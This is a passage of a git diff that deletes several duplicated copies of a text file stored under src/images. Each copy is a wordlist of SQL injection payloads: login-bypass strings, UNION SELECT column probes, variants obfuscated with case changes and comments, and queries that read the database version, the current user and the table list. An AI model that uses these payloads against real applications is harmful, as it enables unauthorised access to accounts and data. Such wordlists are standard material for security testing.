-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
